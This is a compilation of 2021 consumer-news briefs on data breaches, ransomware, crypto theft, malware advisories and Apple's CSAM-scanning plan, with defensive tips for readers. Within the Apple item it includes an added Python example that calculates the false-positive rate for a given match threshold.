The best way to protect yourself is to make sure your antivirus software is up to date. Microsoft said Microsoft Defender Antivirus and Microsoft Defender for Endpoint can effectively detect the vulnerability. Meanwhile, the company said it is investigating the source.

Investigation underway

“Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers,” the company said. “This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.”

Krebs on Security, an authoritative security blog, reports Microsoft has not yet released a patch for the flaw, but it says users can mitigate the threat by disabling the installation of all ActiveX controls in Internet Explorer. Krebs says the vulnerability is currently being used in targeted attacks on both PCs and servers.

FBI Terrorist Watchlist containing nearly 2 million records mistakenly posted online

An FBI terrorist watchlist containing 1.9 million records mistakenly found its way onto the internet unguarded, allowing anyone and everyone to view it.

Volodymyr "Bob" Diachenko, Comparitech’s Head of Security Research, is the person who first stumbled onto the treasure trove. In sharing the details of his find, he said the watchlist came from the Terrorist Screening Center (TSC), a multi-agency group administered by the FBI -- the same agency that’s in charge of the U.S.’ no-fly list. 

Stopped in its tracks

Donning his white hat, Diachenko said he immediately reported the leak to Department of Homeland Security (DHS) officials before he went any further. He said DHS acknowledged the incident and thanked him for his efforts. However, the agency did not provide any further official comment.

Diachenko said a typical record in the list contained these details:

  • Full name

  • TSC watchlist ID

  • Citizenship

  • Gender

  • Date of birth

  • Passport number

  • Country of issuance

  • No-fly indicator

The name alone -- terrorist watchlist -- sounds ominous, and it is. According to PCMag’s investigation of the situation, the list consists of people who are suspected of terrorism but who have not necessarily been charged with any crime yet. 

“In the wrong hands, this list could be used to oppress, harass, or persecute people on the list and their families. It could cause any number of personal and professional problems for innocent people whose names are included in the list,” reported Matthew Humphries.

One of those "personal problems" made headlines in 2017 when consumers won a $60 million verdict against TransUnion after it misidentified them in their credit reports as terrorists and drug traffickers. 

Could this happen to you?

The no-fly list has proven to be a double-edged sword. While the FBI can justify its reasons, the American Civil Liberties Union (ACLU) has long found fault with the list because people placed on it aren’t always notified. 

Could something like this happen to anyone? The short answer is yes. As an example, infants have been prevented from boarding planes at airports across the U.S. because their names happened to be the same as, or similar to, those of possible terrorists on the government's "no-fly list."

The ACLU says both U.S. citizens and “lawful permanent residents” have rights that the DHS and TSC are supposed to review before any action is taken. The ACLU offers tips to anyone who is mistakenly caught in the no-fly snare. A complete list of dos and don’ts is available here.

Big Tech to spend billions of dollars on cybersecurity after meeting with Biden administration

There’s barely a week that goes by without a high-profile cybersecurity incident. Not only do these scourges affect everyday life for businesses, but consumers are also impacted as hackers go after any amount of personal data they can access.

In a face-to-face meeting with President Biden on Wednesday, Big Tech stalwarts Amazon, Apple, Google, IBM, and Microsoft all agreed to write big, fat checks to help the nation as a whole address the rising tide of cybersecurity threats. The companies also plan to address the ever-widening abyss of high-growth jobs in the tech sector. 

Spending billions to shore up cybersecurity

Here’s what Big Tech told President Biden they’ll commit to:

Google says it’s good for $10 billion over the next five years to expand zero-trust programs, help secure the software supply chain, and enhance security. The company also promised to assist 100,000 Americans in earning industry-recognized digital skills certificates. 

Apple announced that it will create a new program -- one that includes more than 9,000 U.S. suppliers -- to drive continuous security improvements throughout the technology supply chain. 

Another plus for tech education came from IBM, which announced that it will train 150,000 people in cybersecurity skills over the next three years. The company will place a special focus on historically Black colleges and universities to create “Cybersecurity Leadership Centers” in an effort to grow a more diverse cyber workforce.

Microsoft -- which has been on the wrong end of some serious hacks this year -- announced that it will invest $20 billion between now and 2026 to up the ante on cybersecurity both by design and in delivery throughout its systems. To prime the pump, the company said it will immediately make available $150 million in technical services to help federal, state, and local governments upgrade their current security protection. It will also invest heavily in tech training by expanding partnerships with community colleges and non-profits.

For its part, Amazon said it will make the same security awareness training it offers its employees freely available. It also plans to offer a free multi-factor authentication device to protect against cybersecurity threats like phishing and password theft to all of its Amazon Web Services account holders. Those account holders include companies like Facebook, Netflix, Adobe, ESPN, Ticketmaster, Samsung, and Disney.

Increasing tech education and jobs

One huge challenge facing these Big Tech companies is that nearly half a million cybersecurity jobs remain unfilled. A spokesperson at the Computing Technology Industry Association (CompTIA) told ConsumerAffairs that, as of this week, it was tracking 454,366 job ads for cybersecurity in the U.S. -- 13% more than the year before.

The education effort isn’t being carried solely by Big Tech. To get people trained quickly, colleges and organizations are investing heavily in “micro-credentialing” and training that doesn’t call for a four-year college degree. To that end, Girls Who Code announced that it will establish a micro-credentialing program for historically excluded groups.

The University of Texas System told the White House it will make available entry-level cyber educational programs through UT San Antonio’s Cybersecurity Manufacturing Innovation Institute to help grow new short-term credentials in cyber-related fields by more than 1 million workers.

“To meet the scale of the demand for cybersecurity skills, we need to be considering creative alternatives to the classic college pathway into the profession. The majority of cyber jobs don’t require a four-year computer science degree,” Todd Thibodeaux, president and CEO at CompTIA, told ConsumerAffairs.

“We can have people come through community college programs, through for-profit university programs, through online university programs, through paid apprenticeships and through industry certification programs that can be completed in a matter of months to accelerate this process.”

If there’s any doubt that a tech education can pay off, recent data shows that tech professionals in 9 of the 10 top-paying U.S. states make over 70% more than the average worker. Life as a techie in places like Alabama pays off especially well. The average salary for someone in technology in Alabama is $86,720 a year -- 85% higher than the $46,840 that salary workers in other fields in the state bring home.

Massive Microsoft data leak puts 38 million records at risk

According to researchers, an estimated 38 million records from more than 1,000 apps that use Microsoft's Power Apps portals platform have been exposed. Those records are not only jam-packed with typical personal data like phone numbers and addresses, but they also include data from COVID-19 contact tracing efforts, vaccine registrations, and employee databases.

The security leak also reportedly exposed data from large companies and agencies alike, including Ford, American Airlines, logistics company JB Hunt, the Indiana Department of Health, and New York City public schools, according to Wired magazine. 

Caught in the nick of time

Research analysts from security risk platform company UpGuard first uncovered the issue in May when they found unprotected data from several Microsoft Power Apps portals online.

After investigating the matter further, UpGuard sent a vulnerability report to Microsoft in late June. The researchers showed what specific pieces of data were accessible and made suggestions about what Microsoft could do to disable anonymous access to it. 

By mid-July, Microsoft said it had the situation under control and that most of the data from the Power Apps portals had been made private.

Indiana consumers luck out 

In the Indiana Department of Health’s (IDOH) situation alone, there were nearly 750,000 Hoosiers whose data from the state’s COVID-19 online contact tracing survey was accessed. The information supposedly included names, addresses, emails, genders, ethnicities and races, and dates of birth.

While that might seem dire, those people were actually pretty lucky. According to an announcement made by the state, it was able to get the company that accessed the data to sign a “certificate of destruction.” The agreement confirms that the data was not released to any other entity and was destroyed by the company.

“We believe the risk to Hoosiers whose information was accessed is low. We do not collect Social Security information as a part of our contact tracing program, and no medical information was obtained,” said State Health Commissioner Kris Box, M.D., FACOG. “We will provide appropriate protections for anyone impacted.”

T-Mobile says six million additional accounts were affected by recent data breach

T-Mobile said Friday that the data breach it disclosed earlier this week affected significantly more people than initially believed. 

In a filing with the Securities and Exchange Commission, the carrier said an additional 5.3 million postpaid accounts and 850,000 active T-Mobile prepaid accounts were affected. This brings the total number of affected consumers to more than 54 million. 

On Wednesday, the company confirmed that hackers were able to access data on 7.8 million of its postpaid customers, along with the records of 40 million former and prospective customers. 

Information stolen included customers’ first and last names, dates of birth, Social Security numbers, and driver’s license/ID information. In its latest filing with the SEC, the carrier said phone numbers and IMEI and IMSI details (identifiers for mobile devices and SIM cards respectively) were also compromised.

Mitigating the impact

T-Mobile maintained that it has "no indication" that affected customers’ financial details were exposed. The company said its investigation into the breach is ongoing, and more details will be provided as they’re uncovered. 

T-Mobile emphasized that it’s "confident” that it has successfully “closed off the access and egress points the bad actor used in the attack.” 

The company said it has notified affected account holders and taken steps to safeguard accounts. Customers who think they may have been affected are being offered two years of identity protection services. 

Although no account PINs were compromised, T-Mobile has recommended that all postpaid customers proactively change their PIN by going online into their T-Mobile account or calling the Customer Care team by dialing 611 on their phone.

T-Mobile confirms that data on millions of customers was stolen in breach

T-Mobile says its investigation of a breach of its network shows that hackers were able to access data on 7.8 million of its postpaid customers, along with the records of 40 million former and prospective customers.

“We were able to verify that a subset of T-Mobile data had been accessed by unauthorized individuals,” the company said in a statement. “We also began coordination with law enforcement as our forensic investigation continued. While our investigation is still underway and we continue to learn additional details, we have now been able to confirm that the data stolen from our systems did include some personal information.”

The company said the access point used by the hacker was located and closed. It said no financial or credit card information was compromised. However, officials confirmed that hackers apparently stole customers’ first and last names, dates of birth, Social Security numbers, and driver’s license/ID information. In short, criminals obtained the information needed to steal customers’ identities.

T-Mobile offers assistance to compromised customers

T-Mobile said it is taking the following steps to support customers whose data may have been compromised:

  • Immediately offering 2 years of free identity protection services with McAfee’s ID Theft Protection Service.

  • Recommending all T-Mobile postpaid customers proactively change their PIN by going online into their T-Mobile account or calling the Customer Care team by dialing 611 on their phone. This precaution is being taken despite the fact that we have no knowledge that any postpaid account PINs were compromised.

  • Offering an extra step to protect mobile accounts with Account Takeover Protection capabilities for postpaid customers, which makes it harder for customer accounts to be fraudulently ported out and stolen.

  • Publishing a unique web page later on Wednesday for one-stop information and solutions to help customers take steps to further protect themselves. 

T-Mobile said it was also able to confirm that approximately 850,000 active T-Mobile prepaid customer names, phone numbers, and account PINs were compromised in the breach. 

“We have already proactively reset all of the PINs on these accounts to help protect these customers, and we will be notifying accordingly right away,” T-Mobile said. “No Metro by T-Mobile, former Sprint prepaid, or Boost customers had their names or PINs exposed.”

Other steps consumers can take

T-Mobile customers affected by the breach may also take other steps to prevent identity theft. The first step should be placing a freeze on credit reports maintained by Experian, Equifax, and TransUnion.

The freeze should be placed with all three companies. Someone using a stolen Social Security number will not be able to open new credit accounts as long as the freeze is in place. Fortunately, the process has gotten less complicated over the years. Here are the links to freeze credit information at the three companies:

  • Equifax

  • Experian

  • TransUnion

Freezing credit reports prevents a criminal from opening a credit account in your name, but it prevents you from doing so as well. All three credit agencies make it possible to establish a PIN or password so that your credit can be unfrozen when you are applying for a loan or credit account.

Poly Network offers job to hacker that breached its systems

Cryptocurrency platform Poly Network has offered a job to the hacker who stole nearly $600 million in cryptocurrency tokens from it.

A hacker known as “The White Hat” recently made off with a massive amount of crypto, only to later return most of it. The perpetrator claimed that they stole the funds “for fun” and that it was “always the plan” to return the assets. However, some speculated that the hacker either feared legal consequences or realized how difficult it would be to launder such a large amount of stolen crypto. 

Poly Network has since invited the hacker to become an advisor to the firm. It has also promised a $500,000 “bug bounty” reward in exchange for providing the password needed to retrieve more than $200 million in stolen funds. 

In a message embedded in a transaction last week, an anonymous person claiming to be the perpetrator said they would "PROVIDE THE FINAL KEY WHEN _EVERYONE_ IS READY,” but that hasn’t happened yet. 

Retrieving the remaining funds

On Monday, the hacker said they were “considering taking the bounty as a bonus for public hackers if they can hack the Poly Network.” Poly Network said its offer of a $500,000 reward to “Mr. White Hat” is still on the table. It also said the hacker could have a role as its “chief security advisor.” 

“To extend our thanks and encourage Mr. White Hat to continue contributing to security advancement in the blockchain world together with Poly Network, we cordially invite Mr. White Hat to be the Chief Security Advisor of Poly Network,” the firm said in a statement.

The platform said it has no plans to levy legal charges against Mr. White Hat. On the contrary, it plans to use what it’s learned from the attack to bolster its security measures. The firm said Tuesday that it hopes to implement a “significant system upgrade” to prevent future incidents. However, it says it can’t do so until the remaining funds are returned. 

Memorial Health System hit by ransomware attack that crippled hospitals

Computers owned by Memorial Health System were hit by an attack from the Hive ransomware group on Sunday, causing a system outage. Memorial Health announced that it suffered “an information technology security incident in the early morning hours this morning, August 15, 2021.” 

“As a result, we suspended user access to information technology applications related to our operations,” the non-profit health system said in a statement. 

The company is still struggling to get operations back to normal. In the meantime, medical personnel have been forced to rely on paper records and cancel radiology exams and non-urgent surgical cases. The organization said it didn’t believe patient records were stolen in the attack. 

"At this time no known patient or employee personal or financial information has been compromised," said Memorial Health System president and CEO Scott Cantley. "We are continuing to work with IT security experts to methodically investigate to precisely understand what happened and are taking the appropriate actions to resolve any and all issues."

Hive ransomware group

Memorial Health System represents 64 clinics, including the Marietta Memorial, Selby General, and Sistersville General hospitals in the Marietta-Parkersburg metropolitan area in West Virginia and Ohio. 

The party that carried out the attack is allegedly the Hive ransomware gang, a group that began targeting businesses this summer. Although Memorial Health officials said they didn’t believe any information was compromised, Hive typically links to data stolen from its victims. 

“Like most ransomware gangs, Hive has a leak site called HiveLeaks and hosted on the dark web, where they published links to data stolen from almost two dozen victims that did not pay the ransom,” reported Bleeping Computer. “Most of the businesses listed on the leak site appear to be small to medium sized, many having around or less than 100 employees.”

Apple releases new details on plan to monitor phones for child sexual content

Apple has released new details about its plan to scan consumers’ devices for evidence of child sexual abuse material (CSAM). Following criticism of the idea, Apple now says it will only flag images that have been supplied by clearinghouses in multiple countries. 

Ten days ago, Apple first announced its plan to monitor images stored on iCloud Photos to search for matches of previously identified CSAM. Once Apple’s technology finds a match, a human will review the image. If that person confirms that the image qualifies as CSAM, the National Center for Missing and Exploited Children (NCMEC) would be notified and the user's account would be immediately disabled. 

Apple said its main goal in employing the technology is to protect children from predators. However, critics were concerned that the tech could be exploited by authoritarian governments or used by malicious parties to open a “backdoor” for wider surveillance. 

“While child exploitation is a serious problem, and while efforts to combat it are almost unquestionably well-intentioned, Apple's proposal introduces a backdoor that threatens to undermine fundamental privacy protections for all users of Apple products,” security and tech privacy advocates said in a letter pushing for Apple to rescind its plan. 

New details 

In an effort to ease privacy fears, Apple now says it will tune the system so that it will only flag images supplied by clearinghouses in multiple countries -- not just by the U.S. National Center for Missing and Exploited Children (NCMEC), as announced earlier.

Additionally, only cases where users had about 30 or more potentially illicit pictures will be flagged for human review. If proven legitimate, authorities will be notified about the presence of CSAM in a person’s iCloud library. 

“We expect to choose an initial match threshold of 30 images,” Apple said in a Security Threat Model Review published Friday.

“Since this initial threshold contains a drastic safety margin reflecting a worst-case assumption about real-world performance, we may change the threshold after continued empirical evaluation of NeuralHash false positive rates – but the match threshold will never be lower than what is required to produce a one-in-one trillion false positive rate for any given account.”
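The quoted passage ties the per-account threshold to a target false positive rate, and the relationship is a binomial tail: if each innocent photo false-matches independently with some probability, the chance that an account with a given number of photos crosses the threshold is P(X >= t) for X ~ Binomial(n, p). The code below is an added illustration of that arithmetic, not Apple's method or numbers; the per-image rate `P_PER_IMAGE` and library size `LIBRARY_SIZE` are assumed values chosen for the example, since the page gives neither.

```python
import math

# Assumed inputs for the example (not figures from Apple or the article).
P_PER_IMAGE = 1e-6      # hypothetical per-photo false-match probability
LIBRARY_SIZE = 100_000  # hypothetical number of photos in one account
TARGET_RATE = 1e-12     # the "one in one trillion" per-account target quoted above


def log_binom_pmf(k, n, p):
    """log P(X = k) for X ~ Binomial(n, p), kept in log space so that
    probabilities far below double precision (1e-60 and smaller) don't underflow."""
    if p <= 0.0:
        return 0.0 if k == 0 else -math.inf
    if p >= 1.0:
        return 0.0 if k == n else -math.inf
    return (math.lgamma(n + 1) - math.lgamma(k + 1) - math.lgamma(n - k + 1)
            + k * math.log(p) + (n - k) * math.log1p(-p))


def account_false_positive_rate(p, n, t):
    """P(X >= t) for X ~ Binomial(n, p): the chance an account of n innocent
    photos reaches a threshold of t false matches.

    The upper tail is summed directly; computing 1 - P(X < t) instead would
    round to exactly 0 once the tail drops below float precision."""
    if t <= 0:
        return 1.0
    total = 0.0
    for k in range(t, n + 1):
        term = math.exp(log_binom_pmf(k, n, p))
        total += term
        # Past the mean, successive terms shrink geometrically; stop once negligible.
        if k > n * p and term < total * 1e-18:
            break
    return total


def min_threshold(p, n, target=TARGET_RATE):
    """Smallest threshold t whose account-level false positive rate is <= target."""
    t = 1
    while account_false_positive_rate(p, n, t) > target:
        t += 1
    return t


if __name__ == "__main__":
    for t in (1, 5, 10, 30):
        print(f"threshold {t:2d}: P(account flagged) = "
              f"{account_false_positive_rate(P_PER_IMAGE, LIBRARY_SIZE, t):.3e}")
    print("smallest threshold meeting target:",
          min_threshold(P_PER_IMAGE, LIBRARY_SIZE))
```

The point the numbers make is the one Apple's text gestures at: the threshold that meets a fixed account-level target depends entirely on the per-image rate and library size, so a threshold of 30 leaves a large margin only if the per-image rate really is as small as assumed, and re-estimating that rate changes the minimum threshold.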

Privacy concerns still present

Privacy advocates have argued that there’s no tweak that would render Apple’s CSAM surveillance system completely safe from exploitation or abuse. 

“Any system that allows surveillance fundamentally weakens the promises of encryption,” the Electronic Frontier Foundation’s Erica Portnoy said Friday. “No amount of third-party auditability will prevent an authoritarian government from requiring their own database to be added to the system.”

Apple has maintained that the technology will not scan users’ iCloud updates for anything other than CSAM material. Any government requests to “add non-CSAM images to the hash list” would be rejected, the company added. 

T-Mobile investigates hacker’s claim of pulling off a massive data breach

T-Mobile says it is investigating a hacker’s claim that they breached the carrier’s network and stole personal data on all 100 million of its U.S. customers.

Motherboard, a tech site, reported over the weekend that a hacker boasted on a forum that they had gained access to data from T-Mobile servers and that the information is for sale. The dataset reportedly includes names, addresses, phone numbers, and Social Security numbers.

The hacker told Motherboard that the information was obtained through a breach of T-Mobile’s network, and Motherboard said it verified that some of the data it reviewed was related to T-Mobile customers. 

T-Mobile confirms it is investigating

On Sunday, T-Mobile confirmed that it has launched an investigation to determine whether the report is accurate. 

“We are aware of claims made in an underground forum and have been actively investigating their validity,” T-Mobile said in a brief statement to Motherboard. “We do not have any additional information to share at this time.” 

Motherboard quotes the hacker as saying T-Mobile is apparently aware of the breach because the hacker can no longer gain access to the servers. In the meantime, the hacker is reportedly selling about 30 million Social Security and driver’s license numbers for six bitcoins, or about $270,000. 

What to do

T-Mobile customers should take steps to prevent identity theft in case their personal information is obtained by other criminals. The first step should be placing a freeze on credit reports maintained by Experian, Equifax, and TransUnion.

The freeze should be placed with all three companies. Someone using a stolen Social Security number will not be able to open new credit accounts as long as the freeze is in place. Fortunately, the process has gotten less complicated over the years. Here are the links to freeze credit information at the three companies:

  • Equifax

  • Experian

  • TransUnion

Freezing credit reports prevents a criminal from opening a credit account in your name, but it prevents you from doing so as well. All three credit agencies make it possible to establish a PIN or password so that credit can be unfrozen when you are applying for a loan or credit account.

Hacker behind record-breaking Poly Network attack returns stolen cryptocurrency assets

An as-yet-unidentified hacker has returned nearly all of the $600 million stolen by exploiting a vulnerability in the cryptocurrency platform Poly Network. The firm cited the anonymous person claiming to be the perpetrator as saying they were “ready to return” the rest of the stolen digital currency. 

Almost all of the funds have been returned to three digital currency wallets, but $268 million in assets is currently locked in an account that requires passwords from both Poly Network and the hacker. 

“It’s likely that keys held by both Poly Network and the hacker would be required to move the funds — so the hacker could still make these funds inaccessible if they chose to,” Tom Robinson, chief scientist of blockchain analytics firm Elliptic, said in a blogpost Friday.

In a message embedded in the transaction, the hacker said they would “PROVIDE THE FINAL KEY WHEN _EVERYONE_ IS READY.”

Motivation unclear

At this point, it’s still unclear why the hacker decided to return the funds. Some analysts believe the move was motivated by the fact that it’s challenging to launder and cash out large amounts of stolen cryptocurrency. 

“I think this demonstrates that even if you can steal cryptoassets, laundering them and cashing out is extremely difficult, due to the transparency of the blockchain and the use of blockchain analytics,” Robinson told CNBC earlier this week. “In this case the hacker concluded that the safest option was just to return the stolen assets.”

Others have speculated that the hacker was afraid of being exposed and facing legal consequences. The identity of the hacker, who is known as “White Hat,” has yet to be uncovered. However, cybersecurity researchers say the individual left behind numerous “digital breadcrumbs” on the blockchain that could be traced by law enforcement.

According to CNBC, the hacker claimed in a message that they stole the funds “for fun” and that it was “always the plan” to return the funds. Poly Network has described the hack as “the biggest in defi history.” 

Antivirus companies Norton and Avast announce plans to merge

NortonLifeLock and Avast have announced that they’ll be merging to create a larger cybersecurity company. The deal will be worth between $8.1 billion and $8.6 billion, the companies said Tuesday. 

“With this combination, we can strengthen our cyber safety platform and make it available to more than 500 million users,” says Vincent Pilette, NortonLifeLock CEO. “We will also have the ability to further accelerate innovation to transform cyber safety.”

Once the merger is completed, the firm will likely release antivirus products that encompass the benefits of Avast’s focus on privacy and NortonLifeLock’s experience in identity. 

Joining forces

The merger comes at a time of heightened focus on cybersecurity. Ransomware attacks on large companies and infrastructure firms have received attention lately, in terms of both size and frequency. High-profile cases have underscored the need for software effective in guarding against hackers. 

The CEOs of both companies acknowledged the rise in damaging cyberattacks during the coronavirus pandemic and said partnering would help create products that give consumers and businesses peace of mind. 

“The bad guys have been really, really busy taking advantage of the situation created by Covid-19,” said Avast CEO Ondrej Vlcek, who will become president of the combined company. “The massive increase in attacks has been against everyone -- enterprises, small businesses and consumers. Now is the time to join forces and accelerate the transformation of the entire cybersecurity space.”

Hackers begin returning money stolen in massive cryptocurrency heist

On Wednesday, a group of hackers began returning some of the cryptocurrency funds they stole by exploiting a vulnerability in Poly Network, a cryptocurrency platform that facilitates peer-to-peer transactions. 

The hackers recently stole just over $600 million in digital tokens in a cryptocurrency heist that is being regarded as one of the largest in history. Poly Network disclosed the hack on Tuesday and urged the bad actors to “return the hacked assets.” The platform said it planned to take legal action. 

“The amount of money you hacked is the biggest in defi history,” Poly Network said in a tweet. “We will take legal actions and we urge the hackers to return the assets.”

Laundering cryptocurrency is difficult

By Wednesday morning, the hackers had returned around $4.8 million in tokens. A few hours later, about $258 million had been returned. Experts say the hackers may have been motivated not only by Poly’s plea, but by the challenge of laundering stolen crypto on such a large scale. 

“I think this demonstrates that even if you can steal cryptoassets, laundering them and cashing out is extremely difficult, due to the transparency of the blockchain and the use of blockchain analytics,” Tom Robinson, chief scientist of blockchain analytics firm Elliptic, told CNBC. “In this case the hacker concluded that the safest option was just to return the stolen assets.”

Privacy advocates urge Apple to scrap its plan to scan phones for images of child sexual abuse

In an open letter to Apple, thousands of security and tech privacy advocates pushed back against Apple’s plan to scan iPhones for images of child sexual abuse. 

Apple recently announced a plan to use technology capable of searching for matches of “Child Sexual Abuse Material (CSAM)” in images stored on iCloud. The company claimed the accuracy of its system “ensures less than a one in one trillion chance per year of incorrectly flagging a given account.” 

But as of Monday evening, nearly three dozen organizations and over 6,600 individuals (ranging from cryptographers and researchers to security and legal experts) had signed the open letter urging Apple not to go through with its plan to use the tech.

Critics cite privacy risks 

Apple said last week that its main goal in employing the system was to “protect children from predators.” The company said user privacy would be kept at the forefront. 

“Instead of scanning images in the cloud, the system performs on-device matching using a database of known CSAM image hashes provided by NCMEC and other child safety organizations,” Apple said in a statement announcing the new policy. “Apple further transforms this database into an unreadable set of hashes that is securely stored on users’ devices.”

However, critics argue that the system could be exploited by authoritarian governments or even make it possible for malicious parties to open a “backdoor” for wider surveillance. 

“While child exploitation is a serious problem, and while efforts to combat it are almost unquestionably well-intentioned, Apple's proposal introduces a backdoor that threatens to undermine fundamental privacy protections for all users of Apple products,” the letter reads.

The signatories request that Apple table its proposed policy and issue a statement “reaffirming their commitment to end-to-end encryption and user privacy.”

“Apple's current path threatens to undermine decades of work by technologists, academics and policy advocates towards strong privacy-preserving measures being the norm across a majority of consumer electronic devices and use cases,” the letter said. “We ask that Apple reconsider its technology rollout, lest it undo that important work.”

Apple announces plan to scan U.S. phones for evidence of child sexual abuse

Apple says that it plans to scan iPhones for images of child sexual abuse. The plan received a warm welcome from child protection groups but caused concern with security researchers who worry that Apple’s intention could be exploited by authoritarian governments wanting to play Big Brother and spy on their citizens.

The technology Apple is employing will monitor images stored on iCloud Photos, searching for matches of previously identified “Child Sexual Abuse Material (CSAM),” the new, preferred term over “child pornography.” The company claims its system is so accurate that it “ensures less than a one in one trillion chance per year of incorrectly flagging a given account.” 

When the system lands on a match, a human will review the image. If that person confirms that the image qualifies as CSAM, the National Center for Missing and Exploited Children (NCMEC) will be notified and the user's account will be immediately disabled. 

Apple said forthcoming versions of iOS and iPadOS set for release later this year will contain "new applications of cryptography to help limit the spread of CSAM online, while designing for user privacy." Even though most Apple users don’t give much thought to cryptography, Apple already applies it, mostly in Safari, to regularly check derivations of a user’s passwords against a publicly available list of breached passwords to keep their account safe and secure.

A Herculean effort and a game-changer

Apple is looking at a monumental task. The NCMEC views over 25 million images a year, and the U.S. is one of the largest producers of these types of images and videos. 

In its analysis, the Canadian Centre for Child Protection stated that 67% of child sexual abuse material survivors are impacted much differently by the distribution of their images than they are by hands-on abuse. 

“The reason for this is tragic; distribution goes on in perpetuity, and these images are permanent when they are constantly re-shared,” said Gina Cristiano of ADF Solutions, a mobile and digital forensics company.

"Apple's expanded protection for children is a game changer," said John Clark, the president and CEO of the National Center for Missing and Exploited Children. "With so many people using Apple products, these new safety measures have lifesaving potential for children."

“This will break the dam”

Despite Apple’s good intentions, some privacy experts are concerned that the company is crossing a line.

One of those -- Matthew Green, a cryptography researcher at Johns Hopkins University -- raised concerns that Apple’s system could be used to frame innocent people simply by sending them otherwise innocuous images that have been crafted to trigger a CSAM match, defeating Apple's algorithm and alerting law enforcement. 

"Researchers have been able to do this pretty easily," Green said. "Regardless of what Apple's long term plans are, they've sent a very clear signal. In their (very influential) opinion, it is safe to build systems that scan users' phones for prohibited content."

Green says this decision could also prompt governments to ask for all sorts of information about their citizens.

"Whether they turn out to be right or wrong on that point hardly matters. This will break the dam — governments will demand it from everyone,” he said. "What happens when the Chinese government says, 'Here is a list of files that we want you to scan for?'" Green asked. "Does Apple say no? I hope they say no, but their technology won't say no."

Researchers find new ‘Vultur’ malware being used to steal banking credentials

A new Android-based malware has been found that uses screen recording to log activity on infected devices and ultimately steal sensitive information from them.

The malware, dubbed “Vultur” by researchers at Amsterdam-based security firm ThreatFabric, was reportedly distributed through the Google Play Store. It was disguised as an app called “Protection Guard,” which garnered over 5,000 installations. The primary targets were banking and crypto-wallet apps from entities located in Italy, Australia, and Spain.

The researchers said they found that the remote access trojan (RAT) worked by taking advantage of accessibility permissions to capture keystrokes. It leveraged screen recording features to log all activities on the targeted device, enabling it to steal banking credentials and more.

Abuses accessibility services

When Vultur is first installed, it abuses accessibility services built into the mobile operating system in order to obtain the required permissions. It does so by borrowing an overlay from other malware families. After that, it goes to work monitoring all requests that trigger the accessibility services. 

"For the first time we are seeing an Android banking trojan that has screen recording and keylogging as the main strategy to harvest login credentials in an automated and scalable way," researchers from ThreatFabric said.

The researchers said the tactics employed by the bad actors behind Vultur are a deviation from “the common HTML overlay development we usually see in other Android banking Trojans,” which tends to be a more time-consuming way to siphon information.

“Instead, they chose to simply record what is shown on the screen, effectively obtaining the same end result,” the team wrote. 

"The story of Vultur shows one more time how actors shift from using rented Trojans (MaaS) that are sold on underground markets towards proprietary/private malware tailored to the needs of this group," the researchers concluded. "These attacks are scalable and automated since the actions to perform fraud can be scripted on the malware backend and sent in the form of commands sequence, making it easy for the actor(s) to hit-and-run."

Apple warns users to immediately install update to counter serious security flaw

Apple users are being urged to immediately install an update on their devices to avoid a nasty exploit that could lead to a malicious malware infection.

Thanks to a tip-off from an anonymous researcher, Apple has issued a security update for Mac, iPhone, and iPad users -- iOS 14.7.1, iPadOS 14.7.1, and macOS Big Sur 11.5.1. The company says the update will repair a memory corruption issue that has been proven to allow a malicious app to "execute arbitrary code with kernel privileges." 

That explanation sounds a bit technical, but the company has made it known that the exploit is serious and running rampant.

How to do the update

Some Apple users have likely already received a pop-up notice signaling that an automatic update will be installed later on Tuesday. For those who’d rather not wait, the update process is simple.

For iPhone and iPad users:

  1. Update your iOS or iPadOS device by navigating to Settings > General > Software Update. 

  2. After that, tap "Download and Install" and the security update will be downloaded and applied.

After that, you should be protected from the malware. 

For Mac users:

  1. Open the Apple menu

  2. Select System Preferences

  3. Click Software Update

  4. Then click "Update Now," which will download the latest update and patch your system.

At that point, you should be good to go.

Microsoft warns consumers about LemonDuck malware threat affecting Windows devices

Microsoft sent out an important heads-up to its customers on Friday to warn about malware that’s targeting Windows-based computer systems. This specific threat comes from LemonDuck, a crypto-mining malware that reportedly begins with a single infection and then spreads quickly across a computer network. If left unchecked, it can turn every resource from USB devices to emails into cryptocurrency mining slaves. 

Unfortunately, LemonDuck’s threat doesn’t stop with just Windows users. “It’s one of a few documented bot malware families that targets Linux systems as well as Windows devices,” Microsoft 365’s Defender Threat Intelligence Team warned users in a blog post.

“And, it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched Exchange Server vulnerabilities to gain access to outdated systems.”

The Microsoft 365 team says it is taking this threat seriously because of LemonDuck’s ability to constantly evolve. While the malware is primarily known for its cryptocurrency mining objectives, it can also expand its foothold by stealing credentials, removing security controls, spreading via emails, and putting more tools in place to support human-operated activity.

Red flags

There’s not much a typical Windows (or Linux) user can do on a network-wide scale, but there are some things everyday users should be aware of if they want to avoid being turned into a LemonDuck victim.

The most important piece of advice is to be vigilant when it comes to emails. Microsoft researchers say LemonDuck’s standard email subjects and body content can include jarring phrases like “The Truth of COVID-19” or seemingly out-of-place phrases like “farewell letter” or “good bye.” 

The team says these phrases are usually meant to elicit a reaction and get you to click on something. When that happens, your device is then infected by the malware. While these words and phrases are one red flag to look out for, there are two other easy ones that you can usually spot right away: poor spelling and suspicious files. 

Spelling mistakes are a common component of many scam messages, so you should beware of any email that is littered with these errors. When it comes to files, Microsoft says many scam emails tend to use .doc, .js, or .zip files that usually have a title like “readme” to entice users into clicking on them. Just make sure you don’t.

France says China state hackers are using compromised routers in massive attack campaign

Authorities from France warned Wednesday that Chinese hackers are using hacked home and office routers as part of a large and ongoing attack campaign. 

In an advisory, France’s National Agency for Information Systems Security (ANSSI) said a hacking group known as APT31 (sometimes known as Zirconium or Judgment Panda) is using compromised routers to target French organizations. 

“ANSSI is currently handling a large intrusion campaign impacting numerous French entities,” ANSSI warned. “Attacks are still ongoing and are led by an intrusion set publicly referred to as APT31. It appears from our investigations that the threat actor uses a network of compromised home routers as operational relay boxes in order to perform stealth reconnaissance as well as attacks.”

The advisory did not specify which organizations were targeted in the campaign, but ANSSI said around 160 IP addresses can be used to indicate whether an organization has been a target. 

More scrutiny over supposed China hacking

France joins other foreign governments in accusing Chinese state-backed hackers of malicious cyber activity. Earlier this week, the U.S. and its allies formally accused China of being responsible for the Microsoft Exchange Server hack that compromised the information of numerous organizations. Beijing denied the hacking charges. 

